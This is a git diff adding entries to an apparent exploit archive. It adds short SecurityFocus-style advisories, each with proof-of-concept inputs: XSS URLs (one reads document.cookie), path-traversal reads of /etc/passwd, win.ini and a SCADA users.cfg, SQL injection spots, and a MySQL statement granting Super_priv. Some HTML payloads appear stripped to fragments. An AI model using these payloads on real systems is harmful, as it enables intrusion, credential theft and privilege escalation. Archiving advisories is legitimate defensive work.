diff --git a/files.csv b/files.csv index 55aea54ec..5b04ec274 100755 --- a/files.csv +++ b/files.csv @@ -31314,3 +31314,20 @@ id,file,description,date,author,platform,type,port 34777,platforms/cgi/remote/34777.rb,"GNU bash Environment Variable Command Injection (MSF)",2014-09-25,"Shaun Colley",cgi,remote,0 34779,platforms/hardware/webapps/34779.pl,"Nucom ADSL ADSLR5000UN ISP Credentials Disclosure",2014-09-25,"Sebastián Magof",hardware,webapps,80 34781,platforms/php/webapps/34781.txt,"Wordpress All In One WP Security Plugin 3.8.2 - SQL Injection",2014-09-25,"High-Tech Bridge SA",php,webapps,80 +34782,platforms/php/webapps/34782.txt,"NetArt Media Car Portal 2.0 'car' Parameter SQL Injection Vulnerability",2010-09-27,RoAd_KiLlEr,php,webapps,0 +34783,platforms/php/webapps/34783.txt,"Scriptsez Ultimate Poll 'demo_page.php' Cross Site Scripting Vulnerability",2009-07-16,Moudi,php,webapps,0 +34784,platforms/php/webapps/34784.txt,"Micro CMS 1.0 'name' Field HTML Injection Vulnerability",2010-09-28,"Veerendra G.G",php,webapps,0 +34785,platforms/php/webapps/34785.txt,"phpMyFAQ 2.6.x 'index.php' Cross Site Scripting Vulnerability",2010-09-28,"Yam Mesicka",php,webapps,0 +34786,platforms/php/webapps/34786.txt,"eCardMAX Multiple Cross Site Scripting Vulnerabilities",2009-07-14,Moudi,php,webapps,0 +34787,platforms/php/webapps/34787.txt,"MODx 2.0.2-pl manager/index.php modahsh Parameter XSS",2010-09-29,"John Leitch",php,webapps,0 +34788,platforms/php/webapps/34788.txt,"MODx manager/controllers/default/resource/tvs.php class_key Parameter Traversal Local File Inclusion",2010-09-29,"John Leitch",php,webapps,0 +34789,platforms/php/webapps/34789.html,"GetSimple CMS 2.01 'admin/changedata.php' Cross Site Scripting Vulnerability",2010-09-29,"High-Tech Bridge SA",php,webapps,0 +34790,platforms/php/webapps/34790.txt,"Pluck 4.6.3 'cont1' Parameter HTML Injection Vulnerability",2010-09-29,"High-Tech Bridge SA",php,webapps,0 +34791,platforms/php/webapps/34791.txt,"Swinger Club Portal start.php id Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0 +34792,platforms/php/webapps/34792.txt,"Swinger Club Portal start.php go Parameter Remote File Inclusion",2009-07-07,Moudi,php,webapps,0 +34793,platforms/php/webapps/34793.txt,"Top Paidmailer 'home.php' Remote File Include Vulnerability",2009-07-13,Moudi,php,webapps,0 +34794,platforms/cgi/webapps/34794.txt,"Intellicom Netbiter webSCADA Products 'read.cgi' Multiple Remote Security Vulnerabilities",2010-10-01,"Eugene Salov",cgi,webapps,0 +34795,platforms/php/webapps/34795.txt,"WebAsyst Shop-Script 'index.php' Cross Site Scripting Vulnerability",2009-07-09,Vrs-hCk,php,webapps,0 +34796,platforms/multiple/remote/34796.txt,"Oracle MySQL Prior to 5.1.50 Privilege Escalation Vulnerability",2010-08-03,"Libing Song",multiple,remote,0 +34797,platforms/php/webapps/34797.txt,"SurgeMail SurgeWeb 4.3e Cross Site Scripting Vulnerability",2010-10-04,"Kerem Kocaer",php,webapps,0 +34798,platforms/php/webapps/34798.txt,"ITS SCADA Username SQL Injection Vulnerability˛",2010-10-04,"Eugene Salov",php,webapps,0 diff --git a/platforms/cgi/webapps/34794.txt b/platforms/cgi/webapps/34794.txt new file mode 100755 index 000000000..44382b83e --- /dev/null +++ b/platforms/cgi/webapps/34794.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/43636/info + +Intellicom Netbiter webSCADA products are prone to multiple remote security vulnerabilities, including a directory-traversal vulnerability, an information-disclosure vulnerability, and an arbitrary-file-upload vulnerability. + +An attacker can exploit these issues to upload and execute arbitrary script code on an affected computer with the privileges of the webserver process, view arbitrary local files, or obtain sensitive data that can aid in further attacks. + +Netbiter webSCADA WS100 and Netbiter webSCADA WS200 are vulnerable; other versions may also be affected. + +http://www.example.com/cgi-bin/read.cgi?page=../../../../../../../../../../../etc/passwd%00 +http://www.example.com/gi-bin/read.cgi?file=/home/config/users.cfg +http://www.example.com/cgi-bin/read.cgi?page=config.html&file=/home/config/pages/2.conf§ion=PAGE2 \ No newline at end of file diff --git a/platforms/multiple/remote/34796.txt b/platforms/multiple/remote/34796.txt new file mode 100755 index 000000000..c7d7a7784 --- /dev/null +++ b/platforms/multiple/remote/34796.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/43677/info + +MySQL is prone to a remote privilege-escalation vulnerability. + +An attacker can exploit this issue to run arbitrary SQL statements with 'SUPER' privileges on the slave database system. This will allow the attacker to compromise the affected database system. + +This issue affects versions prior to MySQL 5.1.50. + +UPDATE db1.tbl1 /*!514900 ,mysql.user */ +SET db1.tbl1.col1=2 /*!514900 ,mysql.user.Super_priv='Y' +WHERE mysql.user.User='user1'*/; \ No newline at end of file diff --git a/platforms/php/webapps/34782.txt b/platforms/php/webapps/34782.txt new file mode 100755 index 000000000..60c91be2c --- /dev/null +++ b/platforms/php/webapps/34782.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/43536/info + +Car Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Car Portal 2.0 is vulnerable; other versions may also be affected. + +http://www.example.com/autoportal10/index.php?page=en_Home&car=[SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/34783.txt b/platforms/php/webapps/34783.txt new file mode 100755 index 000000000..76a0061a1 --- /dev/null +++ b/platforms/php/webapps/34783.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/43552/info + +Ultimate Poll is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/up/demo_page.php?action=vote&pid=test_poll&clr=1>'>alert(310294726286)%3B \ No newline at end of file diff --git a/platforms/php/webapps/34784.txt b/platforms/php/webapps/34784.txt new file mode 100755 index 000000000..13ec6905c --- /dev/null +++ b/platforms/php/webapps/34784.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/43556/info + +Micro CMS is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +Micro CMS 1.0 beta 1 is vulnerable; other versions may also be affected. + + + in "* Name" textbox in comment section and fill other sections properly. diff --git a/platforms/php/webapps/34785.txt b/platforms/php/webapps/34785.txt new file mode 100755 index 000000000..788897ac5 --- /dev/null +++ b/platforms/php/webapps/34785.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/43560/info + +phpMyFAQ is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Versions prior to phpMyFAQ 2.6.9 are vulnerable. + +http://www.example.com/index.php/"> \ No newline at end of file diff --git a/platforms/php/webapps/34786.txt b/platforms/php/webapps/34786.txt new file mode 100755 index 000000000..3a7f76552 --- /dev/null +++ b/platforms/php/webapps/34786.txt @@ -0,0 +1,18 @@ +source: http://www.securityfocus.com/bid/43570/info + +eCardMAX is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +eCardMAX 2006 and 2008 are vulnerable; other versions may also be affected. + +http://www.example.com/standard_2006/grabber.php?grab_url=1%3Cscript%3Ealert(1192520984065)%3C/script%3E + +http://www.example.com/standard_2006/members.php?cs_message=1%3C/textarea%3E%3CScRiPt%20%0A%0D%3Ealert(846719933916)%3B%3C/ScRiPt%3E + +http://www.example.com/standard_2006/resource/games/memory/memory.php?step=show_ins&cat=1%3E%22%3E%3CScRiPt%20%0A%0D%3Ealert(1295561226285)%3B%3C/ScRiPt%3E + +http://www.www.example.com/gold_2008/resource/games/ephotohunt/ephotohunt.php?step=show_ins&cat=1>"> + + + diff --git a/platforms/php/webapps/34787.txt b/platforms/php/webapps/34787.txt new file mode 100755 index 000000000..9a2bf0540 --- /dev/null +++ b/platforms/php/webapps/34787.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/43577/info + +MODx is prone to a local file-include vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute local files within the context of the webserver process. Information harvested may aid in further attacks. + +The attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +MODx 2.0.2-pl is vulnerable; other versions may also be affected. + +http://www.example.com/modx/manager/index.php?modahsh=%22%3E%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/34788.txt b/platforms/php/webapps/34788.txt new file mode 100755 index 000000000..41c108b61 --- /dev/null +++ b/platforms/php/webapps/34788.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/43577/info + +MODx is prone to a local file-include vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute local files within the context of the webserver process. Information harvested may aid in further attacks. + +The attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +MODx 2.0.2-pl is vulnerable; other versions may also be affected. + +http://www.example.com/modx/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00 \ No newline at end of file diff --git a/platforms/php/webapps/34789.html b/platforms/php/webapps/34789.html new file mode 100755 index 000000000..e0820771c --- /dev/null +++ b/platforms/php/webapps/34789.html @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/43593/info + +GetSimple CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +GetSimple CMS 2.01 is vulnerable; prior versions may also be affected. + +
\ No newline at end of file diff --git a/platforms/php/webapps/34790.txt b/platforms/php/webapps/34790.txt new file mode 100755 index 000000000..86f2dd554 --- /dev/null +++ b/platforms/php/webapps/34790.txt @@ -0,0 +1,17 @@ +source: http://www.securityfocus.com/bid/43597/info + +Pluck is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +Pluck 4.6.3 is vulnerable; other versions may also be affected. + +
+ +' /> + + + + +
+ \ No newline at end of file diff --git a/platforms/php/webapps/34797.txt b/platforms/php/webapps/34797.txt new file mode 100755 index 000000000..a2217b1c3 --- /dev/null +++ b/platforms/php/webapps/34797.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/43679/info + +SurgeMail is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +The issue affects version 4.3e; other versions may also be affected. + +http://www.example.com/surgeweb?username_ex="/>alert(document.cookie);